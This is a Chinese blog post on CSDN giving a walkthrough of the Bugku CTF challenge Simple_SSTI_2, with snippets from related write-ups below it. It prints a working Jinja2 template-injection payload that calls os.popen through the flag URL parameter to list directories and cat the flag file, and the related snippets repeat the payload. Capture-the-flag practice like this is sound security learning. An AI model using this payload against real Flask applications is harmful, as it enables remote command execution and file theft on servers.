Bugku:Simple_SSTI_2

最新推荐文章于 2024-05-09 16:01:08 发布
最新推荐文章于 2024-05-09 16:01:08 发布
阅读量1w 收藏 21
点赞数 20
分类专栏: Bugku CTF_Web_Writeup
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46230755/article/details/114646032
版权

我超喜欢这种题目的,确实对我这种萌新非常的友好
打开后,题目提示存在模板注入
先进行ls查看一下存在的文件。

/?flag={{%20config.__class__.__init__.__globals__[%27os%27].popen(%27ls%20../%27).read()%20}}

在这里插入图片描述
发现存在一些文件夹,进行一个个进入查看,运气很好,第一个看的app文件夹里就有flag

?flag={{%20config.__class__.__init__.__globals__[%27os%27].popen(%27ls%20../app/%27).read()%20}}

在这里插入图片描述
因为没有过滤直接cat ../app/flag

?flag={{%20config.__class__.__init__.__globals__[%27os%27].popen(%27cat%20../app/flag%27).read()%20}}

在这里插入图片描述

FW_ENJOEY
关注
  • 20
    点赞
  • 21
    收藏
    觉得还不错? 一键收藏
  • 9
    评论
专栏目录
flaskssti:测试SSTI
02-21
4. `templates/`:存放Jinja2模板文件的地方,可能存在易受SSTI攻击的模板。 5. `tests/`:测试代码,可能有用于检查SSTI漏洞的单元测试。 6. `examples/`:示例代码,展示如何触发和修复SSTI漏洞。 通过深入研究...
Simple_SSTI_2
天天学安全专属博客
03-03 974
Simple_SSTI_2,backup靶场
[bugku]Simple_SSTI_2
ZhShy
03-10 3369
进入页面之后F12没发现什么有用的东西。 照例看看config: http://114.67.175.224:12482/?flag={{config}} 没有flag 试一试 http://114.67.175.224:12482/?flag={{%20config.__class__.__init__.__globals__[%27os%27].popen(%27ls%20../%27).read()%20}} __class__:用来查看变量所属的类,根据前面的变量形式可以得到其所属的类。 __i
BugKu练习记录11:Simple_SSTI_2
最新发布
qq_44396970的博客
05-09 185
7}},返回49,再注入{{7*‘7’}},返回7777777,判断为jinja2模板。题目提示为ssti,先判断使用的模板;发现存在flag文件,打开后得到答案。7},未返回49,继续注入{{7。通过config调用os尝试。
Bugku Simple_SSTI_2
qq_52718293的博客
10-23 2501
首先打开之后是上面这样,题目有提示是ssti,所以
Simple_SSTI_1与Simple_SSTI_2
heyingcheng的博客
10-17 3064
#__globals__[] 使用方式是 函数名.__globals__获取function所处空间下可使用的module、方法以及所有变量。flask是一个使用Python编写的轻量级Web应用框架(一种开发框架,用来支持动态网站,网络应用程序及网络服务的开发。3,SECRET_KEY配置变量是通用密钥,可在Flask和多个第三方扩展中使用,加密的强度取决于变量值的机密度,不同的程序使用不同的密钥。于是猜测flag是否藏在某一个文件夹中,于是尝试用ls列举出文件夹中的文件一下。
【愚公系列】2023年06月 Bugku-Web(Simple_SSTI_2)
时光隧道
06-22 6081
Flask是一个使用Python编写的轻量级Web应用框架。它的设计目标是简单明了,易于扩展和维护。Flask提供了基本的Web开发所需的组件,如路由、请求和响应处理、会话管理、模板渲染等,同时还支持各种第三方扩展和插件,可以轻松地实现各种复杂的Web应用开发。Flask框架也因其灵活性和简易性而广受欢迎,被许多Web开发者用于构建Web应用和API。Flask是一个使用Python编写的轻量级Web应用框架。它的设计目标是简单明了,易于扩展和维护。
ssti-payload:SSTI有效载荷生成器
02-06
SSTI有效载荷发生器 该生成器是针对特定类型的Java SSTI的,其受以下启发: ${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99)....
Gf-Patterns:GF模式(ssrf,RCE,Lfi,sqli,ssti,idor,URL重定向,debug_logic,有趣的Subs)参数grep
03-19
Gf模式V 1.9 By grep的包装器,可帮助您grep处理问题安装如果您已经安装并配置了Go,则可以使用以下命令安装waybackurls & Gf : :play_button: go get -u github.com/tomnomnom/waybackurls:play_button: go get -u...
ssti-payloads::bullseye:服务器端模板注入有效负载
04-13
服务器端模板注入有效负载 服务器端模板注入是指攻击者能够使用本机模板语法将恶意有效载荷注入模板中,然后在服务器端执行该模板。 模板引擎旨在通过将固定模板与易失性数据结合来生成网页。...
fenjing工具,ssti
12-17
标题中的“fenjing工具,ssti”指的是Fenjing,一个可能用于安全测试或Web应用漏洞扫描的工具,而“ssti”则是Server-Side Template Injection(服务器端模板注入)的缩写,这是一种常见的Web应用程序安全漏洞。...
Bugku [Simple_SSTI_2](基于ctf题目学习SSTI服务器模板注入)
MAHRE_Z的博客
11-09 704
打开网址发现一串英文,提示“You need pass in a parameter named flag”(“您需要传入一个名为 flag 的参数”),根据题目提示SSTI,搜索一下SSTI,发现一篇文章介绍。显示为flag参数的值,可以知道页面会显示被传入flag参数的值,然后进行报错看一看网站使用的模板类型。不错,其中有讲到什么是注入,说是格式化字符串漏洞的一种体现,然后我就又找了一篇关于。发现目录,进入app目录,发现flag文件。用cat命令查看flag,得到flag。
BugKu CTF之 Simple_SSTI_2
weixin_42557264的博客
09-16 1867
进入场景 和Simple_SSTI_1一样 提示需要传一个flag参数 F12也没有任何其他提示 ls一下看看内部文件 /?flag={{%20config.__class__.__init__.__globals__[%27os%27].popen(%27ls%20../%27).read()%20}} 发现存在一些文件夹,进入查看,先看看第一个,运气很好,第一个app文件夹里就有flag 因为没有过滤直接cat …/app/flag ?flag={{%20config.__clas.
BugKuSimple_SSTISSTI模板注入)
热门推荐
m0_54082441的博客
05-01 1万+
1.签到题 这个题相当easy了,只要按照描述来做,便能得到flag,答案如下: flag{BugKu-Sec-pwn!} 2.Simple_SSTI_1(SSTI模板注入) 点击链接进入,题目说: You need pass in a parameter named flag。(你需要传入一个名为flag的参数)然后我们可以直接f12查看,也可以右击页面--->“检查” 如图所示,我们会得到相关的提示,根据提示信息,我们利用flask的模板注入,就能直接得到flag。
bugkuctf-Simple_SSTI_2
qq_51775369的博客
03-10 5423
bugku-ctf
Bugku CTF-Web篇writeup Simple_SSTI_1-2
anlr2020的博客
07-13 3227
Simple_SSTI_1 根据题目名得知为 简单_服务器模板注入 打开服务器场景英文提示,“你需要传入一个名为flag的参数”,得到参数名为flag F12或Ctrl+U查看一下网页代码 “你知道,在flask框架中,我们通常设置一个SECRET_KEY变量” flask:是由python实现的一种微web框架 SECRET_KEY:flask中的一种配置属性,flask涉及安全的东西需要用这个SECRET_KEY密钥进行加密 基本上根据提示可以确定题目的flag就藏在SECR..
bugku学习5:Simple_SSTI_2(web)
weixin_46041615的博客
11-02 3860
打开页面显示: 根据题目给的ssti得知是模块
Bugku CTF Simple_SSTI_2 解题思路
m0_73734159的博客
10-12 330
Bugku CTF Simple_SSTI_2 解题思路
BugkuWeb:Simple_SSTI_2
Light_inthe_eyes的博客
11-04 212
题目提示就很明显了是模板注入 flag={{config.__class__.__init__.__globals__['os'].popen('ls ../').read() }} flag={{config.__class__.__init__.__globals__['os'].popen('ls ../app').read() }} flag={{config.__class__.__init__.__globals__['os'].popen('cat ../app/flag').read
bugku simple_ssti_1
03-16
simple_ssti_1 是一道来自 Bugku 的简单 Server-Side Template Injection(SSTI)漏洞题目。 SSTI 漏洞通常发生在使用模板引擎时,攻击者可以利用这种漏洞执行任意代码。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 9
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值